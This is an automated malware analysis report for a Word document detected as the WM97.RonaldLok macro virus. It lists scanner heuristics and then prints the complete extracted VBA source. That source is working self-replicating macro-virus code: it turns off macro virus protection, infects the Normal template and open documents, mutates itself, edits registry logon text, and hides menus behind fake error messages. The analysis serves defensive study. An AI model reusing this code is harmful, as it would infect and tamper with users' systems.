MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
This document exhibits characteristics of a legacy macro-virus, specifically identified as Win.Trojan.Pivis-2 by ClamAV. The presence of Auto_Close and Auto_Open macros, along with legacy WordBasic markers, indicates an attempt to execute malicious code upon opening or closing the document. The VBA script attempts to disable macro security features and modify system settings, likely to facilitate further malicious activity or persistence.
Heuristics 5
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.VirusProtection = False -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5926 bytes |
SHA-256: 2186802608917d420067bd8a61c4a49ea1e8c4498fb24eb05af80a0d577bd06b |
|||
|
Detection
ClamAV:
Doc.Trojan.Agnes-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "RonaldLok"
Sub VjFxJx5031()
' -= [LineZerO's Macro Engine 1.2] =-
' -= [WM97.RonaldLok] =-
' -= [ID: 17063-Vk-16825031-Ls.W] =-
On Error Resume Next
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
End With
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
'This code is taken from Pyro | Thanks
Set Current = MacroContainer
For Grow = 1 To 20
Number = Current.VBProject.VBComponents("RonaldLok").CodeModule.ProcCountLines("VjFxJx5031", vbext_pk_Proc)
RandomLine = Int(Rnd() * Number + 1)
RemarkLength = Int(Rnd() * 40 + 1)
For Length = 1 To RemarkLength
Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
Next Length
Current.VBProject.VBComponents("RonaldLok").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
Remark = ""
Next Grow
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeCaption") = "HELLO !"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeText") = "HELLO ! RONALD LOK !"
Call DzNvJy4461
End Sub
Sub DzNvJy4461()
On Error Resume Next
Application.CommandBars("Edit").Enabled = False
Application.CommandBars("Insert").Enabled = False
Application.CommandBars("Format").Enabled = False
End Sub
Sub Vk1682()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
With Options
.SaveNormalPrompt = False
.VirusProtection = False
.ConfirmConversions = False
End With
Application.VBE.ActiveVBProject.VBComponents("RonaldLok").Export "C:\RonaldLok.sys"
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
.Comments = "WM97.RonaldLok" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
.Keywords = "LiME ID: 17063-Vk-16825031-Ls.W"
.Execute
End With
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(x).Name = "RonaldLok" Then PjDeAy5889MjTtUm1682 = True
Next x
For y = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(y).Name = "RonaldLok" Then OpHuNx4461VjFxJx5031 = True
Next y
If PjDeAy5889MjTtUm1682 = True And OpHuNx4461VjFxJx5031 = False Then Set ArVrGw8470DzNvJy7074 = ActiveDocument.VBProject
If PjDeAy5889MjTtUm1682 = False And OpHuNx4461VjFxJx5031 = True Then Set ArVrGw8470DzNvJy7074 = NormalTemplate.VBProject
If PjDeAy5889MjTtUm1682 = True And OpHuNx4461VjFxJx5031 = True Then GoTo Ende_
ArVrGw8470DzNvJy7074.VBComponents.Import "C:\RonaldLok.sys"
If OpHuNx4461VjFxJx5031 = False Then ActiveDocument.SaveAs (WordBasic.[FileName$]()), FileFormat:=wdFormatDocument
If PjDeAy5889MjTtUm1682 = False Then NormalTemplate.Save
Ende_:
Call VjFxJx5031
End Sub
Sub AutoClose()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
End Sub
Sub AutoExit()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
End Sub
Sub AutoNew()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
End Sub
Sub AutoExec()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
End Sub
Sub DateiNeu()
On Error Resume Next
Dialogs(wdDialogFileNew).Show
Call Vk1682
Call VjFxJx5031
End Sub
Sub DateiOffnen()
On Error Resume Next
Dialogs(wdDialogFileOpen).Show
Call Vk1682
Call VjFxJx5031
End Sub
Sub DateiSchliesen()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
WordBasic.FileClose dlg
End Sub
Sub DateiSpeichern()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
ActiveDocument.Save
End Sub
Sub DateiSpeichernUnter()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub DateiDrucken()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
Dialogs(wdDialogFilePrint).Show
End Sub
Sub BearbeitenErsetzen()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
Dialogs(wdDialogEditReplace).Show
End Sub
Sub ExtrasRechtschreibung()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
If Options.CheckGrammarWithSpelling = True Then
ActiveDocument.CheckGrammar
Else
ActiveDocument.CheckSpelling
End If
End Sub
Sub ExtrasSilbentrennung()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
Dialogs(wdDialogsToolsHyphenation).Show
End Sub
Sub ExtrasOptionen()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
Dialogs(wdDialogToolsOptions).Show
End Sub
Sub ViewCode()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
MsgBox "Nicht genug Speicher um Anwendung auszufuhren", 16, "Microsoft Word"
End Sub
Sub ViewVBCode()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
MsgBox "Nicht genug Speicher um Anwendung auszufuhren", 16, "Microsoft Word"
End Sub
Sub FileTemplates()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
MsgBox "Nicht genug Speicher um Anwendung auszufuhren", 16, "Microsoft Word"
End Sub
Sub ToolsMacro()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
MsgBox "Nicht genug Speicher um Anwendung auszufuhren", 16, "Microsoft Word"
End Sub
Sub FormatStyle()
On Error Resume Next
Call Vk1682
Call VjFxJx5031
MsgBox "Nicht genug Speicher um Anwendung auszufuhren", 16, "Microsoft Word"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.